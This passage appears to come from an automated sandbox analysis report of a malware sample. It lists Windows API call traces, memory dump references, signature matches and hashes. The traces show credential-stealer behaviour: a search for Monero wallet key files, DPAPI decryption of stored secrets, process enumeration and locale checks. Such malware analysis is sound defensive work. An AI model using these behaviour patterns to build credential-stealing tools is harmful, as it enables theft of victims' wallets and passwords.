                                    • StrCmpCA.SHLWAPI(?,000A14B4), ref: 0008DB33
                                    • StrCmpCA.SHLWAPI(?,000A14B8), ref: 0008DB49
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0008DDCC
                                    • FindClose.KERNEL32(000000FF), ref: 0008DDDE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID:
                                    • API String ID: 3334442632-0
                                    • Opcode ID: 45a33dbe8b6dc25ccca459e9e035aabeae628abe7acacdb18343a7d53927abed
                                    • Instruction ID: 327a6f51d0521cd1beae36e7ed03c7cc846d7e005170c4ca4bb0bed9772ca8fa
                                    • Opcode Fuzzy Hash: 45a33dbe8b6dc25ccca459e9e035aabeae628abe7acacdb18343a7d53927abed
                                    • Instruction Fuzzy Hash: 6D912172A1011897CF14FBB0EC5ADEE737DBB85300F408659B94A96182EE349B09DBD2
                                    APIs
                                      • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                    • GetKeyboardLayoutList.USER32(00000000,00000000,000A05AF), ref: 00097BE1
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00097BF9
                                    • GetKeyboardLayoutList.USER32(?,00000000), ref: 00097C0D
                                    • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00097C62
                                    • LocalFree.KERNEL32(00000000), ref: 00097D22
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                    • String ID: /
                                    • API String ID: 3090951853-4001269591
                                    • Opcode ID: 81166046b76b0cb69d5a1ea2eab6c255d183ea6b8b1b6a2b9a319fb7a0d2b7c2
                                    • Instruction ID: 07cb86b741787c115480b0ffb1b5d5c5a2381c1c5d1427cb1d921ace4a507326
                                    • Opcode Fuzzy Hash: 81166046b76b0cb69d5a1ea2eab6c255d183ea6b8b1b6a2b9a319fb7a0d2b7c2
                                    • Instruction Fuzzy Hash: AF412B71951218ABDF24DB94DC99BEEB3B4FF44700F204199E10966191DB342F85DFA1
                                    APIs
                                      • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                      • Part of subcall function 0009A920: lstrcpy.KERNEL32(00000000,?), ref: 0009A972
                                      • Part of subcall function 0009A920: lstrcat.KERNEL32(00000000), ref: 0009A982
                                      • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D38988,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                      • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                      • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                      • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,000A0D73), ref: 0008E4A2
                                    • StrCmpCA.SHLWAPI(?,000A14F8), ref: 0008E4F2
                                    • StrCmpCA.SHLWAPI(?,000A14FC), ref: 0008E508
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0008EBDF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                    • String ID: \*.*
                                    • API String ID: 433455689-1173974218
                                    • Opcode ID: 11a605ee506d1920a2818185598b50d551986f91ecfaf2f786b8a4e9a60723e0
                                    • Instruction ID: d3efdca41f8e1e66c50a18dd04c21ce4823f7f53fccc19982cf5cb1acbd87cae
                                    • Opcode Fuzzy Hash: 11a605ee506d1920a2818185598b50d551986f91ecfaf2f786b8a4e9a60723e0
                                    • Instruction Fuzzy Hash: 94120F71A101189ADF18FBB0DC96EEE7379BF55300F4045A9B50A96092EF306F49DBE2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: *(iY$Go~?$gJw]$qo`$xH'R$-rz
                                    • API String ID: 0-1502928147
                                    • Opcode ID: c1b401dcada12f524afc65413d8f88efa0eb1a08fc11c5704aa6dba035586517
                                    • Instruction ID: 56a78a09a9ce7c9c1e3c37040015eab4ad914228ceab741a8d6f338ed85e6e3d
                                    • Instruction Fuzzy Hash: 4AB21BF360C214AFE704AE2DDC8567ABBE9EF94320F1A493DEAC4C3744E53598058697
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 73U $>o^$rrI<$rvY6$-;[$j7{
                                    • API String ID: 0-3469731591
                                    • Opcode ID: 9c5168011601cd8bffb042fd3ee50f255f43d64a298aacf5a3826a44d893415f
                                    • Instruction ID: 2b76dbb7d15591dc985a1328f1b0a0062dd91580c8f9ad197ffc855e45438d56
                                    • Instruction Fuzzy Hash: 6FB2E0B390C204AFE3046F29EC8567AFBE5EF94720F16492DEAC887740E6355845CB97
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: -~w$;w_$@H7]$c\oo$me;
                                    • API String ID: 0-3379050250
                                    • Opcode ID: 6819a5a83f4f730b0d97c1cff5902b91f6ad166cfe459822b85dd9dd05c2373a
                                    • Instruction ID: fd2a378339b045931722529ea760ba628f16d05dcdda739dfc0e90de560f5670
                                    • Instruction Fuzzy Hash: C3B227F390C2149FE3046E2DDC8567ABBE5EF94720F1A4A3DEAC4D7744EA3598018693
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 7t?4$Geo[$b%'$tf'~$x%g
                                    • API String ID: 0-2187750480
                                    • Opcode ID: bba6c9580b66e738e5c1055d146d45e186bab3b12e20b7823a95e0b870eb93c7
                                    • Instruction ID: ee24991c35f4277840e412d7a2e0d76440560cf8c685417a3043963d5df5e6e3
                                    • Instruction Fuzzy Hash: 78A22AF3A0C2009FE7046E2DEC8577ABBE9EF94320F16463DEAC5C7740E67598058696
                                    APIs
                                    • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0008C871
                                    • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0008C87C
                                    • lstrcat.KERNEL32(?,000A0B46), ref: 0008C943
                                    • lstrcat.KERNEL32(?,000A0B47), ref: 0008C957
                                    • lstrcat.KERNEL32(?,000A0B4E), ref: 0008C978
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$BinaryCryptStringlstrlen
                                    • String ID:
                                    • API String ID: 189259977-0
                                    • Opcode ID: fb5b4077386e941c78fc7b11391dc38818e84f9625eb47ae46e254aa827ce760
                                    • Instruction ID: 7cf60a212d1c0c550992f3594dde78d0c44affb8926c88b478d38a2a955f4965
                                    • Instruction Fuzzy Hash: 09416DB591421EDBDB10DFA4DD89FEEB7B8BB48708F1045A8F509A6280D7705A84CFA1
                                    APIs
                                    • GetSystemTime.KERNEL32(?), ref: 0009696C
                                    • sscanf.NTDLL ref: 00096999
                                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 000969B2
                                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 000969C0
                                    • ExitProcess.KERNEL32 ref: 000969DA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Time$System$File$ExitProcesssscanf
                                    • String ID:
                                    • API String ID: 2533653975-0
                                    • Opcode ID: e08513a433fbdb050d94e147d75e71f92704544db75523194b8c635db61074a2
                                    • Instruction ID: 553691634105c9edbc89f06f25b3688f270dd69b7f57c09778d9b8ef7790c18a
                                    • Instruction Fuzzy Hash: 3721CB75D1420CABCF04EFE4E9499EEB7B9BF48304F04852AE506E3250EB355609DBA9
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0008724D
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00087254
                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00087281
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 000872A4
                                    • LocalFree.KERNEL32(?), ref: 000872AE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                    • String ID:
                                    • API String ID: 2609814428-0
                                    • Opcode ID: 58c29c7ca52253026c4cabb1ac25f5777bf83710273d2d443fed6b404dda830c
                                    • Instruction ID: 6baab73669f6eb53c19e37e24e0913d04fe4b88bb647246a582df4924e9b6cee
                                    • Instruction Fuzzy Hash: 3F011275A40208BBEB10DFE4DD4AF9D77B8FB44704F104155FB05AB2C0D670AA008B65
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0009961E
                                    • Process32First.KERNEL32(000A0ACA,00000128), ref: 00099632
                                    • Process32Next.KERNEL32(000A0ACA,00000128), ref: 00099647
                                    • StrCmpCA.SHLWAPI(?,00000000), ref: 0009965C
                                    • CloseHandle.KERNEL32(000A0ACA), ref: 0009967A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                    • String ID:
                                    • API String ID: 420147892-0
                                    • Opcode ID: 7757566010108f417a7abe5d36587dc775015db55e9605541bc31bbec28cd01b
                                    • Instruction ID: 0b66e62a007652c1e98bd5b7b0b0b0091a34d21ec5c262e12fba75dd7fb5a12b
                                    • Instruction Fuzzy Hash: AD010C75A00208EBCF24DFA5DD48FEDBBF8FB48304F104288A90696240D7349B44DF51
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: IYw>$IYw>$m3_{$s;{_
                                    • API String ID: 0-4280254159
                                    • Opcode ID: bf22612a831882701309d189eb3b11506633a81dc77a0c7dabfc6d75b8393688
                                    • Instruction ID: 5fcb4c992f572bd12db8beeeebf1546483f187d1471de394b9b7564c972840c4
                                    • Instruction Fuzzy Hash: 93B206F36082049FE304AE2DEC8577AB7E9EF94720F1A853DE6C4C7744EA3598058697
                                    APIs
                                    • CryptBinaryToStringA.CRYPT32(00000000,00085184,40000001,00000000,00000000,?,00085184), ref: 00098EC0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: BinaryCryptString
                                    • String ID:
                                    • API String ID: 80407269-0
                                    • Opcode ID: 719d190bed3db6718c233ab0f3fb32a0cdcefe89079d32cdd3fe6cb4c019c68c
                                    • Instruction ID: 22504cfc9f0935ffe7b6bd86b6a52b0caf35c56c13643e60926f462d9a382a69
                                    • Opcode Fuzzy Hash: 719d190bed3db6718c233ab0f3fb32a0cdcefe89079d32cdd3fe6cb4c019c68c
                                    • Instruction Fuzzy Hash: 21110670200208AFDF40CF64E898FAA33A9AF8A304F10E558F9198B350DB35E841EB60
                                    APIs
                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00084EEE,00000000,00000000), ref: 00089AEF
                                    • LocalAlloc.KERNEL32(00000040,?,?,?,00084EEE,00000000,?), ref: 00089B01
                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00084EEE,00000000,00000000), ref: 00089B2A
                                    • LocalFree.KERNEL32(?,?,?,?,00084EEE,00000000,?), ref: 00089B3F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: BinaryCryptLocalString$AllocFree
                                    • String ID:
                                    • API String ID: 4291131564-0
                                    • Opcode ID: 1eb95aa87054b91d7a35c6c80b51b2d15caee9162813e3be58903358057b7b4c
                                    • Instruction ID: 9a6127d002cceeec661d744ba68c76980b915c2151ae74dd58f17e10827b1432
                                    • Opcode Fuzzy Hash: 1eb95aa87054b91d7a35c6c80b51b2d15caee9162813e3be58903358057b7b4c
                                    • Instruction Fuzzy Hash: BA11A2B4241208AFEB10DF64DC99FAA77B5FB89704F208158F9199B390C7B6A901CB94
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00D3F1E8,00000000,?,000A0E10,00000000,?,00000000,00000000), ref: 00097A63
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00097A6A
                                    • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00D3F1E8,00000000,?,000A0E10,00000000,?,00000000,00000000,?), ref: 00097A7D
                                    • wsprintfA.USER32 ref: 00097AB7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                    • String ID:
                                    • API String ID: 3317088062-0
                                    • Opcode ID: 3b6bd9e69828a4bf1b74210f1bf6dee4c04cc525210b233ca639c363bf3c21b8
                                    • Instruction ID: 41ed6f284bbcf8af567a5e4150229919316100de69810ab92589b55dcf55d1a4
                                    • Opcode Fuzzy Hash: 3b6bd9e69828a4bf1b74210f1bf6dee4c04cc525210b233ca639c363bf3c21b8
                                    • Instruction Fuzzy Hash: E111A1B1945218EBEB20CF54DC49FA9B7B8FB44721F10439AEA0A932C0C7741E40CF52
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 3X|?$I?g$zN|
                                    • API String ID: 0-3293989720
                                    • Opcode ID: f95cfcea0ecc691f03aedb0baf38586a7e63d5c801cdcea045d73aa07ab0f6ae
                                    • Instruction ID: 3c91b1dc3cca4de78fdcdb83ea07239224d1849b141bc1d77324648425648877
                                    • Opcode Fuzzy Hash: f95cfcea0ecc691f03aedb0baf38586a7e63d5c801cdcea045d73aa07ab0f6ae
                                    • Instruction Fuzzy Hash: 76B2F4F360C204AFE7046F29EC8567AFBE9EF94760F1A492DEAC487740E63558408697
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: ~s$ +;o$6JZ
                                    • API String ID: 0-4200540766
                                    • Opcode ID: fb04a0f107c84327b3e4b7c4999fa67d54627e265938e305ed42c6134ffaceca
                                    • Instruction ID: 8283fa4746cf3d73047f5548f8f8ecad982be1970fed52620db531d3f791762b
                                    • Opcode Fuzzy Hash: fb04a0f107c84327b3e4b7c4999fa67d54627e265938e305ed42c6134ffaceca
                                    • Instruction Fuzzy Hash: 9F4238F360C204AFE3046E2DEC8567BBBE9EF98720F1A493DE6C4D3744E97558018696
                                    APIs
                                    • CoCreateInstance.COMBASE(0009E118,00000000,00000001,0009E108,00000000), ref: 00093758
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 000937B0
                                    Memory Dump Source
